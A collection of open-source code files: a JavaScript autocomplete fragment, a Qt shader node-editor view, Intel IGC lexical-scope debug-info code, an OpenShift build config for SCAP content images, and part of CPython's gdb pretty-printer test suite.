if (window.jQuery != null && (obj.string == '$' || obj.string == 'jQuery') &&
(typeof window.jQuery == 'function'))
base = window.jQuery();
else if (window._ != null && (obj.string == '_') && (typeof window._ == 'function'))
base = window._();
}
while (base != null && context.length)
base = base[context.pop().string];
if (base != null) gatherCompletions(base);
}
else {
// If not, just look in the window object and any local scope
// (reading into JS mode internals to get at the local variables)
for (var v = token.state.localVars; v; v = v.next) maybeAdd(v.name);
gatherCompletions(window);
forEach(keywords, maybeAdd);
}
return found;
}
})();
|
{
"pile_set_name": "Github"
}
|
#include "ShaderView.h"
#include "ShaderEditor.h"
#include "ShaderTemplateDataModel.h"
#include "nodeeditor/internal/node/Node.hpp"
#include <QMenu>
#include <QWidgetAction>
#include <QTreeWidget>
#include <QContextMenuEvent>
#include <nodeeditor/FlowScene>
#include "engine/core/log/Log.h"
namespace DataFlowProgramming
{
    // Construct a view with no scene attached; FlowView does all the setup.
    ShaderView::ShaderView(QWidget* parent)
        : FlowView(parent)
    {
    }
    // Construct a view bound to an existing flow scene (not owned here).
    ShaderView::ShaderView(QtNodes::FlowScene* scene, QWidget* parent)
        : FlowView(scene, parent)
    {
    }
    // Nothing to release: child widgets are owned by Qt's parent hierarchy.
    ShaderView::~ShaderView()
    {
    }
    // Show the node-palette context menu (filter box + category tree) when
    // right-clicking empty canvas; clicks on an item keep the default menu.
    void ShaderView::contextMenuEvent(QContextMenuEvent* event)
    {
        if (itemAt(event->pos()))
        {
            // Cursor is over a node/connection: let the item handle it.
            QGraphicsView::contextMenuEvent(event);
            return;
        }

        QMenu modelMenu;

        // Sentinel stored on category rows; clicking them creates no node.
        auto skipText = QStringLiteral("skip me");

        //Add filterbox to the context menu
        auto* txtBox = new QLineEdit(&modelMenu);  // parented to the menu -> freed with it
        txtBox->setPlaceholderText(QStringLiteral("Filter"));
        txtBox->setClearButtonEnabled(true);
        auto* txtBoxAction = new QWidgetAction(&modelMenu);
        txtBoxAction->setDefaultWidget(txtBox);
        modelMenu.addAction(txtBoxAction);

        //Add result treeview to the context menu
        auto* treeView = new QTreeWidget(&modelMenu);
        treeView->header()->close();
        auto* treeViewAction = new QWidgetAction(&modelMenu);
        treeViewAction->setDefaultWidget(treeView);
        modelMenu.addAction(treeViewAction);

        // One top-level row per registered node category.
        QMap<QString, QTreeWidgetItem*> topLevelItems;
        for (auto const& cat : _scene->registry().categories())
        {
            if (cat != skipText)
            {
                auto item = new QTreeWidgetItem(treeView);
                item->setText(0, cat);
                item->setData(0, Qt::UserRole, skipText);
                topLevelItems[cat] = item;
            }
        }

        // One child row per registered model, grouped under its category.
        for (auto const& assoc : _scene->registry().registeredModelsCategoryAssociation())
        {
            // NOTE(review): QMap::operator[] default-inserts a nullptr for
            // an unknown category (e.g. the skipped one); the null check
            // below keeps that harmless.
            auto parent = topLevelItems[assoc.second];
            if (parent)
            {
                auto item = new QTreeWidgetItem(parent);
                item->setText(0, assoc.first);
                item->setData(0, Qt::UserRole, assoc.first);
            }
        }

        treeView->expandAll();

        // Create the chosen node at the click position. Capturing locals by
        // reference is safe here: the menu runs modally (exec) below, so the
        // lambda cannot outlive this scope.
        connect(treeView, &QTreeWidget::itemClicked, [&](QTreeWidgetItem* item, int)
        {
            QString modelName = item->data(0, Qt::UserRole).toString();
            if (modelName == skipText)
            {
                return;
            }

            auto type = _scene->registry().create(modelName);
            if (type)
            {
                auto& node = _scene->createNode(std::move(type));
                QPoint pos = event->pos();
                QPointF posView = this->mapToScene(pos);
                node.nodeGraphicsObject().setPos(posView);
                _scene->nodePlaced(node);
            }
            else
            {
                EchoLogError("Model not found");
            }
            modelMenu.close();
        });

        //Setup filtering
        connect(txtBox, &QLineEdit::textChanged, [&](const QString& text)
        {
            for (auto& topLvlItem : topLevelItems)
            {
                if (topLvlItem)
                {
                    for (int i = 0; i < topLvlItem->childCount(); ++i)
                    {
                        auto child = topLvlItem->child(i);
                        auto modelName = child->data(0, Qt::UserRole).toString();
                        const bool match = (modelName.contains(text, Qt::CaseInsensitive));
                        child->setHidden(!match);
                    }
                }
            }
        });

        // make sure the text box gets focus so the user doesn't have to click on it
        txtBox->setFocus();

        modelMenu.exec(event->globalPos());
    }
}
|
{
"pile_set_name": "Github"
}
|
/*===================== begin_copyright_notice ==================================
Copyright (c) 2017 Intel Corporation
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be included
in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
======================= end_copyright_notice ==================================*/
//
// The LLVM Compiler Infrastructure
//
// This file is distributed under the University of Illinois Open Source
// License. See LICENSE.TXT for details.
//
///////////////////////////////////////////////////////////////////////////////
// This file is based on llvm-3.4\lib\CodeGen\LexicalScopes.cpp
///////////////////////////////////////////////////////////////////////////////
#include "llvm/Config/llvm-config.h"
#include "common/LLVMWarningsPush.hpp"
#include "llvm/ADT/STLExtras.h"
#include "llvm/IR/DebugInfo.h"
#include "llvm/IR/Function.h"
#include "llvm/IR/Metadata.h"
#include "llvm/Support/Debug.h"
#include "llvm/Support/FormattedStream.h"
#include "llvm/IR/Module.h"
#include "common/LLVMWarningsPop.hpp"
#include "LexicalScopes.hpp"
#include "VISAModule.hpp"
#include "Probe/Assertion.h"
#define DEBUG_TYPE "lexicalscopes"
using namespace llvm;
using namespace IGC;
/// Destructor - drop all scope maps and cached pointers.
LexicalScopes::~LexicalScopes()
{
    releaseMemory();
}
/// releaseMemory - reset all cached state: the module pointer, the
/// function-level scope, and every scope map/list.
void LexicalScopes::releaseMemory()
{
    // Use nullptr consistently (the rest of this file already does).
    VisaM = nullptr;
    CurrentFnLexicalScope = nullptr;
    LexicalScopeMap.clear();
    AbstractScopeMap.clear();
    InlinedLexicalScopeMap.clear();
    AbstractScopesList.clear();
}
/// initialize - Scan machine function and construct lexical scope nest.
void LexicalScopes::initialize(const IGC::VISAModule* M)
{
    releaseMemory();
    VisaM = M;
    SmallVector<InsnRange, 4> MIRanges;
    DenseMap<const Instruction*, LexicalScope*> MI2ScopeMap;
    // Pass 1: split the instruction stream into ranges of uniform debug
    // location, creating the scopes those locations refer to.
    extractLexicalScopes(MIRanges, MI2ScopeMap);
    // CurrentFnLexicalScope is set as a side effect of scope creation when
    // a parentless (function-level) scope is first encountered.
    if (CurrentFnLexicalScope)
    {
        // Pass 2: number scopes via DFS, then attach ranges to scopes.
        constructScopeNest(CurrentFnLexicalScope);
        assignInstructionRanges(MIRanges, MI2ScopeMap);
    }
}
/// extractLexicalScopes - Extract instruction ranges for each lexical scopes
/// for the given machine function.
void LexicalScopes::
extractLexicalScopes(SmallVectorImpl<InsnRange>& MIRanges,
    DenseMap<const Instruction*, LexicalScope*>& MI2ScopeMap)
{
    // Scan each instruction and create scopes. First build working set of scopes.
    const Instruction* RangeBeginMI = nullptr;  // first instruction of the open range
    const Instruction* PrevMI = nullptr;        // last instruction folded into it
    const DILocation* PrevDL = nullptr;         // debug location of the open range
    for (IGC::VISAModule::const_iterator II = VisaM->begin(), IE = VisaM->end();
        II != IE; ++II)
    {
        const Instruction* MInsn = *II;

        // Check if instruction has valid location information.
        const DILocation* MIDL = MInsn->getDebugLoc();
        if (!MIDL)
        {
            // Locationless instructions just extend the current range.
            PrevMI = MInsn;
            continue;
        }

        // If scope has not changed then skip this instruction.
        if (MIDL == PrevDL)
        {
            PrevMI = MInsn;
            continue;
        }

        // Ignore DBG_VALUE. It does not contribute to any instruction in output.
        //if (VisaM->IsDebugValue(MInsn))
        //continue;

        if (RangeBeginMI)
        {
            // If we have already seen a beginning of an instruction range and
            // current instruction scope does not match scope of first instruction
            // in this range then create a new instruction range.
            InsnRange R(RangeBeginMI, PrevMI);
            // Ranges are keyed by their first instruction; the owning scope
            // is the one for the location the range was opened with.
            MI2ScopeMap[RangeBeginMI] = getOrCreateLexicalScope(PrevDL);
            MIRanges.push_back(R);
        }

        // This is a beginning of a new instruction range.
        RangeBeginMI = MInsn;

        // Reset previous markers.
        PrevMI = MInsn;
        PrevDL = MIDL;
    }

    // Create last instruction range.
    if (RangeBeginMI && PrevMI && PrevDL)
    {
        InsnRange R(RangeBeginMI, PrevMI);
        MIRanges.push_back(R);
        MI2ScopeMap[RangeBeginMI] = getOrCreateLexicalScope(PrevDL);
    }
}
/// findLexicalScope - Find lexical scope, either regular or inlined, for the
/// given DebugLoc. Return NULL if not found.
LexicalScope* LexicalScopes::findLexicalScope(const DILocation* DL)
{
    DILocalScope* Scope = DL->getScope();
    if (!Scope)
        return nullptr;

    // The scope that we were created with could have an extra file - which
    // isn't what we care about in this case.
    if (auto* File = dyn_cast<DILexicalBlockFile>(Scope))
        Scope = File->getScope();

    // Inlined scope instances are keyed by (scope, inlined-at) pairs;
    // otherwise fall back to the regular scope lookup.
    if (auto* IA = DL->getInlinedAt()) {
        auto I = InlinedLexicalScopeMap.find(std::make_pair(Scope, IA));
        return I != InlinedLexicalScopeMap.end() ? &I->second : nullptr;
    }
    return findLexicalScope(Scope);
}
/// getOrCreateLexicalScope - Return the lexical scope for the given debug
/// location components, creating it on first use. For inlined locations the
/// matching abstract (out-of-line) scope is created as well.
LexicalScope* LexicalScopes::getOrCreateLexicalScope(const DILocalScope* Scope,
    const DILocation* IA) {
    if (!IA)
        return getOrCreateRegularScope(Scope);

    // Inlined location: make sure the abstract scope for the inlined
    // function exists, then hand back the concrete inlined instance.
    getOrCreateAbstractScope(Scope);
    return getOrCreateInlinedScope(Scope, IA);
}
/// getOrCreateRegularScope - Find or create a regular lexical scope.
LexicalScope*
LexicalScopes::getOrCreateRegularScope(const DILocalScope* Scope) {
    // Strip any DILexicalBlockFile wrapper so file-only variants share an entry.
    Scope = Scope->getNonLexicalBlockFileScope();

    auto I = LexicalScopeMap.find(Scope);
    if (I != LexicalScopeMap.end())
        return &I->second;

    // FIXME: Should the following dyn_cast be DILexicalBlock?
    LexicalScope* Parent = nullptr;
    if (auto* Block = dyn_cast<DILexicalBlockBase>(Scope))
        Parent = getOrCreateLexicalScope(Block->getScope());  // recurse upward first
    I = LexicalScopeMap.emplace(std::piecewise_construct,
        std::forward_as_tuple(Scope),
        std::forward_as_tuple(Parent, Scope, nullptr,
            false)).first;
    if (!Parent) {
        // A parentless scope is the function's own top-level scope.
        //IGC_ASSERT(cast<DISubprogram>(Scope)->describes(VisaM->GetEntryFunction()));
        //IGC_ASSERT(!CurrentFnLexicalScope);

        CurrentFnLexicalScope = &I->second;
    }

    return &I->second;
}
/// getOrCreateInlinedScope - Find or create an inlined lexical scope.
LexicalScope*
LexicalScopes::getOrCreateInlinedScope(const DILocalScope* Scope,
    const DILocation* InlinedAt) {
    Scope = Scope->getNonLexicalBlockFileScope();
    // Inlined scope instances are keyed by (scope, inlined-at location).
    std::pair<const DILocalScope*, const DILocation*> P(Scope, InlinedAt);
    auto I = InlinedLexicalScopeMap.find(P);
    if (I != InlinedLexicalScopeMap.end())
        return &I->second;

    LexicalScope* Parent;
    if (auto* Block = dyn_cast<DILexicalBlockBase>(Scope))
        // Inner block: parent is the enclosing block inlined at the same site.
        Parent = getOrCreateInlinedScope(Block->getScope(), InlinedAt);
    else
        // Subprogram level: parent is the scope of the call site itself.
        Parent = getOrCreateLexicalScope(InlinedAt);
    I = InlinedLexicalScopeMap.emplace(std::piecewise_construct,
        std::forward_as_tuple(P),
        std::forward_as_tuple(Parent, Scope,
            InlinedAt, false))
        .first;
    return &I->second;
}
/// getOrCreateAbstractScope - Find or create an abstract lexical scope
/// (the out-of-line representation of a scope that has been inlined).
LexicalScope*
LexicalScopes::getOrCreateAbstractScope(const DILocalScope* Scope) {
    IGC_ASSERT_MESSAGE(Scope, "Invalid Scope encoding!");
    Scope = Scope->getNonLexicalBlockFileScope();
    auto I = AbstractScopeMap.find(Scope);
    if (I != AbstractScopeMap.end())
        return &I->second;

    // FIXME: Should the following isa be DILexicalBlock?
    LexicalScope* Parent = nullptr;
    if (auto* Block = dyn_cast<DILexicalBlockBase>(Scope))
        Parent = getOrCreateAbstractScope(Block->getScope());
    I = AbstractScopeMap.emplace(std::piecewise_construct,
        std::forward_as_tuple(Scope),
        std::forward_as_tuple(Parent, Scope,
            nullptr, true)).first;
    // Only subprogram-level abstract scopes are tracked in the flat list.
    if (isa<DISubprogram>(Scope))
        AbstractScopesList.push_back(&I->second);
    return &I->second;
}
/// constructScopeNest - Assign DFS in/out numbers to every scope reachable
/// from Scope so dominance queries reduce to interval containment.
void LexicalScopes::constructScopeNest(LexicalScope* Scope) {
    IGC_ASSERT_MESSAGE(Scope, "Unable to calculate scope dominance graph!");
    // Iterative DFS with an explicit stack (no recursion-depth limit).
    SmallVector<LexicalScope*, 4> WorkStack;
    WorkStack.push_back(Scope);
    unsigned Counter = 0;
    while (!WorkStack.empty()) {
        LexicalScope* WS = WorkStack.back();
        const SmallVectorImpl<LexicalScope*>& Children = WS->getChildren();
        bool visitedChildren = false;
        for (SmallVectorImpl<LexicalScope*>::const_iterator SI = Children.begin(),
            SE = Children.end();
            SI != SE; ++SI) {
            LexicalScope* ChildScope = *SI;
            // DFSOut == 0 marks a child not yet finished; descend into the
            // first such child and rescan when we come back to this node.
            if (!ChildScope->getDFSOut()) {
                WorkStack.push_back(ChildScope);
                visitedChildren = true;
                ChildScope->setDFSIn(++Counter);
                break;
            }
        }
        if (!visitedChildren) {
            // All children finished: close this scope's interval.
            WorkStack.pop_back();
            WS->setDFSOut(++Counter);
        }
    }
}
/// assignInstructionRanges - Find ranges of instructions covered by each
/// lexical scope.
void LexicalScopes::
assignInstructionRanges(SmallVectorImpl<InsnRange>& MIRanges,
    DenseMap<const Instruction*, LexicalScope*>& MI2ScopeMap)
{
    // nullptr rather than NULL, for consistency with the rest of this file.
    LexicalScope* PrevLexicalScope = nullptr;
    for (SmallVectorImpl<InsnRange>::const_iterator RI = MIRanges.begin(),
        RE = MIRanges.end(); RI != RE; ++RI)
    {
        const InsnRange& R = *RI;
        LexicalScope* S = MI2ScopeMap.lookup(R.first);
        IGC_ASSERT_MESSAGE(S, "Lost LexicalScope for a machine instruction!");
        // When the previous scope does not dominate the new one, its open
        // range ends where this range begins.
        if (PrevLexicalScope && !PrevLexicalScope->dominates(S))
            PrevLexicalScope->closeInsnRange(S);
        S->openInsnRange(R.first);
        S->extendInsnRange(R.second);
        PrevLexicalScope = S;
    }
    if (PrevLexicalScope)
        PrevLexicalScope->closeInsnRange();
}
/// dump - Print data structures (debug builds only): DFS numbers, the
/// describing metadata node, and all children, indented per nesting level.
void LexicalScope::dump(unsigned Indent) const
{
#ifndef NDEBUG
    raw_ostream& err = dbgs();
    err.indent(Indent);
    err << "DFSIn: " << DFSIn << " DFSOut: " << DFSOut << "\n";
    const MDNode* N = Desc;
    err.indent(Indent);
    // Dump the debug-info metadata node describing this scope.
    N->dump();
    if (AbstractScope)
        err << std::string(Indent, ' ') << "Abstract Scope\n";

    if (!Children.empty())
        err << std::string(Indent + 2, ' ') << "Children ...\n";
    for (unsigned i = 0, e = Children.size(); i != e; ++i)
    {
        // Skip a self-referential child to avoid infinite recursion.
        if (Children[i] != this)
            Children[i]->dump(Indent + 2);
    }
#endif
}
|
{
"pile_set_name": "Github"
}
|
# ImageStream receiving the built datastream image; local lookup lets pods
# in this namespace reference it by its short name.
kind: ImageStream
apiVersion: image.openshift.io/v1
metadata:
  name: "openscap-ocp4-ds"
spec:
  lookupPolicy:
    local: true
---
# BuildConfig that copies the SCAP datastream XML files into a minimal
# UBI8-based image and pushes it to the ImageStream above.
kind: BuildConfig
apiVersion: build.openshift.io/v1
metadata:
  name: "openscap-ocp4-ds"
spec:
  runPolicy: "Serial"  # run builds one at a time
  triggers:
    -
      type: "ImageChange"
  source:
    # Inline Dockerfile; the XML files come from the build's input context.
    dockerfile: |
      FROM registry.access.redhat.com/ubi8/ubi-minimal
      WORKDIR /
      COPY ssg-ocp4-ds.xml .
      COPY ssg-rhel7-ds.xml .
      COPY ssg-rhcos4-ds.xml .
  strategy:
    dockerStrategy:
      noCache: true  # disable layer caching for this build
  output:
    to:
      kind: "ImageStreamTag"
      name: "openscap-ocp4-ds:latest"
|
{
"pile_set_name": "Github"
}
|
# Verify that gdb can pretty-print the various PyObject* types
#
# The code for testing gdb was adapted from similar work in Unladen Swallow's
# Lib/test/test_jit_gdb.py
import os
import re
import pprint
import subprocess
import sys
import sysconfig
import unittest
import locale
# Is this Python configured to support threads?
try:
import _thread
except ImportError:
_thread = None
from test import support
from test.support import run_unittest, findfile, python_is_optimized
def get_gdb_version():
    """Run ``gdb --version`` and return (full_banner, major, minor).

    Raises unittest.SkipTest when gdb is not installed, and a plain
    Exception when the version banner cannot be parsed.
    """
    command = ["gdb", "-nx", "--version"]
    try:
        process = subprocess.Popen(command,
                                   stdout=subprocess.PIPE,
                                   universal_newlines=True)
        with process:
            banner, _ = process.communicate()
    except OSError:
        # This is what "no gdb" looks like. There may, however, be other
        # errors that manifest this way too.
        raise unittest.SkipTest("Couldn't find gdb on the path")
    # Banner formats seen in the wild:
    #   'GNU gdb (GDB; SUSE Linux Enterprise 12) 7.7\n' -> 7.7
    #   'GNU gdb (GDB) Fedora 7.9.1-17.fc22\n' -> 7.9
    #   'GNU gdb 6.1.1 [FreeBSD]\n' -> 6.1
    #   'GNU gdb (GDB) Fedora (7.5.1-37.fc18)\n' -> 7.5
    match = re.search(r"^GNU gdb.*?\b(\d+)\.(\d+)", banner)
    if match is None:
        raise Exception("unable to parse GDB version: %r" % banner)
    return (banner, int(match.group(1)), int(match.group(2)))
# gdb 7.0 is the first release with embedded Python scripting, which the
# pretty-printer hooks under test depend on.
gdb_version, gdb_major_version, gdb_minor_version = get_gdb_version()
if gdb_major_version < 7:
    raise unittest.SkipTest("gdb versions before 7.0 didn't support python "
                            "embedding. Saw %s.%s:\n%s"
                            % (gdb_major_version, gdb_minor_version,
                               gdb_version))

if not sysconfig.is_python_build():
    raise unittest.SkipTest("test_gdb only works on source builds at the moment.")

# Location of custom hooks file in a repository checkout.
checkout_hook_path = os.path.join(os.path.dirname(sys.executable),
                                  'python-gdb.py')

# Fixed hash seed so gdb output (e.g. dict/set ordering) is reproducible.
PYTHONHASHSEED = '123'
def run_gdb(*args, **env_vars):
    """Runs gdb in --batch mode with the additional arguments given by *args.

    Returns its (stdout, stderr) decoded from utf-8 using the replace handler.
    Extra keyword arguments are injected into the child's environment.
    """
    env = None
    if env_vars:
        env = os.environ.copy()
        env.update(env_vars)
    # -nx: Do not execute commands from any .gdbinit initialization files
    # (issue #22188)
    command = ['gdb', '--batch', '-nx']
    if (gdb_major_version, gdb_minor_version) >= (7, 4):
        # Trust our custom hooks file despite gdb's auto-load security.
        command.extend(['-iex', 'add-auto-load-safe-path ' + checkout_hook_path])
    command.extend(args)
    proc = subprocess.Popen(command,
                            stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE,
                            env=env)
    with proc:
        out, err = proc.communicate()
    return out.decode('utf-8', 'replace'), err.decode('utf-8', 'replace')
# Verify that "gdb" was built with the embedded python support enabled:
gdbpy_version, _ = run_gdb("--eval-command=python import sys; print(sys.version_info)")
if not gdbpy_version:
    raise unittest.SkipTest("gdb not built with embedded python support")

# Verify that "gdb" can load our custom hooks, as OS security settings may
# disallow this without a customised .gdbinit.
cmd = ['--args', sys.executable]  # NOTE(review): appears unused -- run_gdb below gets the args directly; confirm before removing
_, gdbpy_errors = run_gdb('--args', sys.executable)
if "auto-loading has been declined" in gdbpy_errors:
    msg = "gdb security settings prevent use of custom hooks: "
    raise unittest.SkipTest(msg + gdbpy_errors.rstrip())
def gdb_has_frame_select():
    # Does this build of gdb have gdb.Frame.select ?
    stdout, _ = run_gdb("--eval-command=python print(dir(gdb.Frame))")
    m = re.match(r'.*\[(.*)\].*', stdout)
    if not m:
        raise unittest.SkipTest("Unable to parse output from gdb.Frame.select test")
    gdb_frame_dir = m.group(1).split(', ')
    # dir() output quotes each name, hence the quoted membership test.
    return "'select'" in gdb_frame_dir

# Whether the py-up/py-down gdb commands can be exercised on this build.
HAS_PYUP_PYDOWN = gdb_has_frame_select()

# Name of the C function the tests set their breakpoint on.
BREAKPOINT_FN='builtin_id'
class DebuggerTests(unittest.TestCase):
"""Test that the debugger can debug Python."""
    def get_stack_trace(self, source=None, script=None,
                        breakpoint=BREAKPOINT_FN,
                        cmds_after_breakpoint=None,
                        import_site=False):
        '''
        Run 'python -c SOURCE' under gdb with a breakpoint.

        Support injecting commands after the breakpoint is reached

        Returns the stdout from gdb

        cmds_after_breakpoint: if provided, a list of strings: gdb commands
        '''
        # We use "set breakpoint pending yes" to avoid blocking with a:
        #   Function "foo" not defined.
        #   Make breakpoint pending on future shared library load? (y or [n])
        # error, which typically happens python is dynamically linked (the
        # breakpoints of interest are to be found in the shared library)
        # When this happens, we still get:
        #   Function "textiowrapper_write" not defined.
        # emitted to stderr each time, alas.

        # Initially I had "--eval-command=continue" here, but removed it to
        # avoid repeated print breakpoints when traversing hierarchical data
        # structures

        # Generate a list of commands in gdb's language:
        commands = ['set breakpoint pending yes',
                    'break %s' % breakpoint,

                    # The tests assume that the first frame of printed
                    #  backtrace will not contain program counter,
                    #  that is however not guaranteed by gdb
                    # therefore we need to use 'set print address off' to
                    #  make sure the counter is not there. For example:
                    # #0 in PyObject_Print ...
                    #  is assumed, but sometimes this can be e.g.
                    # #0 0x00003fffb7dd1798 in PyObject_Print ...
                    'set print address off',

                    'run']

        # GDB as of 7.4 onwards can distinguish between the
        # value of a variable at entry vs current value:
        #   http://sourceware.org/gdb/onlinedocs/gdb/Variables.html
        # which leads to the selftests failing with errors like this:
        #   AssertionError: 'v@entry=()' != '()'
        # Disable this:
        if (gdb_major_version, gdb_minor_version) >= (7, 4):
            commands += ['set print entry-values no']

        if cmds_after_breakpoint:
            commands += cmds_after_breakpoint
        else:
            commands += ['backtrace']

        # print commands

        # Use "commands" to generate the arguments with which to invoke "gdb":
        # NOTE(review): run_gdb() already prepends ('gdb', '--batch', '-nx'),
        # so the three leading items below also reach gdb as positional
        # arguments; the later --args overrides them. Confirm before cleaning up.
        args = ["gdb", "--batch", "-nx"]
        args += ['--eval-command=%s' % cmd for cmd in commands]
        args += ["--args",
                 sys.executable]

        if not import_site:
            # -S suppresses the default 'import site'
            args += ["-S"]

        if source:
            args += ["-c", source]
        elif script:
            args += [script]

        # print args
        # print (' '.join(args))

        # Use "args" to invoke gdb, capturing stdout, stderr:
        out, err = run_gdb(*args, PYTHONHASHSEED=PYTHONHASHSEED)

        errlines = err.splitlines()
        unexpected_errlines = []

        # Ignore some benign messages on stderr.
        ignore_patterns = (
            'Function "%s" not defined.' % breakpoint,
            "warning: no loadable sections found in added symbol-file"
            " system-supplied DSO",
            "warning: Unable to find libthread_db matching"
            " inferior's thread library, thread debugging will"
            " not be available.",
            "warning: Cannot initialize thread debugging"
            " library: Debugger service failed",
            'warning: Could not load shared library symbols for '
            'linux-vdso.so',
            'warning: Could not load shared library symbols for '
            'linux-gate.so',
            'warning: Could not load shared library symbols for '
            'linux-vdso64.so',
            'Do you need "set solib-search-path" or '
            '"set sysroot"?',
            'warning: Source file is more recent than executable.',
            # Issue #19753: missing symbols on System Z
            'Missing separate debuginfo for ',
            'Try: zypper install -C ',
            )
        for line in errlines:
            if not line.startswith(ignore_patterns):
                unexpected_errlines.append(line)

        # Ensure no unexpected error messages:
        self.assertEqual(unexpected_errlines, [])
        return out
def get_gdb_repr(self, source,
cmds_after_breakpoint=None,
import_site=False):
# Given an input python source representation of data,
# run "python -c'id(DATA)'" under gdb with a breakpoint on
# builtin_id and scrape out gdb's representation of the "op"
# parameter, and verify that the gdb displays the same string
#
# Verify that the gdb displays the expected string
#
# For a nested structure, the first time we hit the breakpoint will
# give us the top-level structure
# NOTE: avoid decoding too much of the traceback as some
# undecodable characters may lurk there in optimized mode
# (issue #19743).
cmds_after_breakpoint = cmds_after_breakpoint or ["backtrace 1"]
gdb_output = self.get_stack_trace(source, breakpoint=BREAKPOINT_FN,
cmds_after_breakpoint=cmds_after_breakpoint,
import_site=import_site)
# gdb can insert additional '\n' and space characters in various places
# in its output, depending on the width of the terminal it's connected
# to (using its "wrap_here" function)
m = re.match('.*#0\s+builtin_id\s+\(self\=.*,\s+v=\s*(.*?)\)\s+at\s+\S*Python/bltinmodule.c.*',
gdb_output, re.DOTALL)
if not m:
self.fail('Unexpected gdb output: %r\n%s' % (gdb_output, gdb_output))
return m.group(1), gdb_output
def assertEndsWith(self, actual, exp_end):
'''Ensure that the given "actual" string ends with "exp_end"'''
self.assertTrue(actual.endswith(exp_end),
msg='%r did not end with %r' % (actual, exp_end))
def assertMultilineMatches(self, actual, pattern):
m = re.match(pattern, actual, re.DOTALL)
if not m:
self.fail(msg='%r did not match %r' % (actual, pattern))
    def get_sample_script(self):
        # Path to the sample script debugged by the script-based tests.
        return findfile('gdb_sample.py')
class PrettyPrintTests(DebuggerTests):
    def test_getting_backtrace(self):
        # Smoke test: the breakpoint function must appear in the backtrace.
        gdb_output = self.get_stack_trace('id(42)')
        self.assertTrue(BREAKPOINT_FN in gdb_output)
    def assertGdbRepr(self, val, exp_repr=None):
        # Ensure that gdb's rendering of the value in a debugged process
        # matches repr(value) in this process:
        # ascii() keeps the inferior's source ASCII-only regardless of val.
        gdb_repr, gdb_output = self.get_gdb_repr('id(' + ascii(val) + ')')
        if not exp_repr:
            exp_repr = repr(val)
        self.assertEqual(gdb_repr, exp_repr,
                         ('%r did not equal expected %r; full output was:\n%s'
                          % (gdb_repr, exp_repr, gdb_output)))
    def test_int(self):
        'Verify the pretty-printing of various int values'
        self.assertGdbRepr(42)
        self.assertGdbRepr(0)
        self.assertGdbRepr(-7)
        # Values large enough to need multiple internal digits:
        self.assertGdbRepr(1000000000000)
        self.assertGdbRepr(-1000000000000000)

    def test_singletons(self):
        'Verify the pretty-printing of True, False and None'
        self.assertGdbRepr(True)
        self.assertGdbRepr(False)
        self.assertGdbRepr(None)

    def test_dicts(self):
        'Verify the pretty-printing of dictionaries'
        self.assertGdbRepr({})
        self.assertGdbRepr({'foo': 'bar'}, "{'foo': 'bar'}")
        # NOTE(review): the expected text assumes the printer emits keys in
        # this particular order; confirm against the gdb hooks if this flakes.
        self.assertGdbRepr({'foo': 'bar', 'douglas': 42}, "{'douglas': 42, 'foo': 'bar'}")

    def test_lists(self):
        'Verify the pretty-printing of lists'
        self.assertGdbRepr([])
        self.assertGdbRepr(list(range(5)))

    def test_bytes(self):
        'Verify the pretty-printing of bytes'
        self.assertGdbRepr(b'')
        self.assertGdbRepr(b'And now for something hopefully the same')
        self.assertGdbRepr(b'string with embedded NUL here \0 and then some more text')
        # Control characters:
        self.assertGdbRepr(b'this is a tab:\t'
                           b' this is a slash-N:\n'
                           b' this is a slash-R:\r'
                           )
        # Non-ASCII bytes:
        self.assertGdbRepr(b'this is byte 255:\xff and byte 128:\x80')
        self.assertGdbRepr(bytes([b for b in range(255)]))
    def test_strings(self):
        'Verify the pretty-printing of unicode strings'
        # Text that can't be encoded in the locale encoding is expected to be
        # rendered in its ascii()-escaped form instead of literally.
        encoding = locale.getpreferredencoding()
        def check_repr(text):
            try:
                text.encode(encoding)
                # NOTE(review): 'printable' is never read; candidate for removal.
                printable = True
            except UnicodeEncodeError:
                self.assertGdbRepr(text, ascii(text))
            else:
                self.assertGdbRepr(text)

        self.assertGdbRepr('')
        self.assertGdbRepr('And now for something hopefully the same')
        self.assertGdbRepr('string with embedded NUL here \0 and then some more text')

        # Test printing a single character:
        #    U+2620 SKULL AND CROSSBONES
        check_repr('\u2620')

        # Test printing a Japanese unicode string
        # (I believe this reads "mojibake", using 3 characters from the CJK
        # Unified Ideographs area, followed by U+3051 HIRAGANA LETTER KE)
        check_repr('\u6587\u5b57\u5316\u3051')

        # Test a character outside the BMP:
        #    U+1D121 MUSICAL SYMBOL C CLEF
        # This is:
        # UTF-8: 0xF0 0x9D 0x84 0xA1
        # UTF-16: 0xD834 0xDD21
        check_repr(chr(0x1D121))

    def test_tuples(self):
        'Verify the pretty-printing of tuples'
        self.assertGdbRepr(tuple(), '()')
        self.assertGdbRepr((1,), '(1,)')  # singleton tuple keeps its comma
        self.assertGdbRepr(('foo', 'bar', 'baz'))
    def test_sets(self):
        'Verify the pretty-printing of sets'
        if (gdb_major_version, gdb_minor_version) < (7, 3):
            self.skipTest("pretty-printing of sets needs gdb 7.3 or later")
        self.assertGdbRepr(set(), 'set()')
        self.assertGdbRepr(set(['a', 'b']), "{'a', 'b'}")
        self.assertGdbRepr(set([4, 5, 6]), "{4, 5, 6}")

        # Ensure that we handle sets containing the "dummy" key value,
        # which happens on deletion:
        gdb_repr, gdb_output = self.get_gdb_repr('''s = set(['a','b'])
s.remove('a')
id(s)''')
        self.assertEqual(gdb_repr, "{'b'}")

    def test_frozensets(self):
        'Verify the pretty-printing of frozensets'
        if (gdb_major_version, gdb_minor_version) < (7, 3):
            self.skipTest("pretty-printing of frozensets needs gdb 7.3 or later")
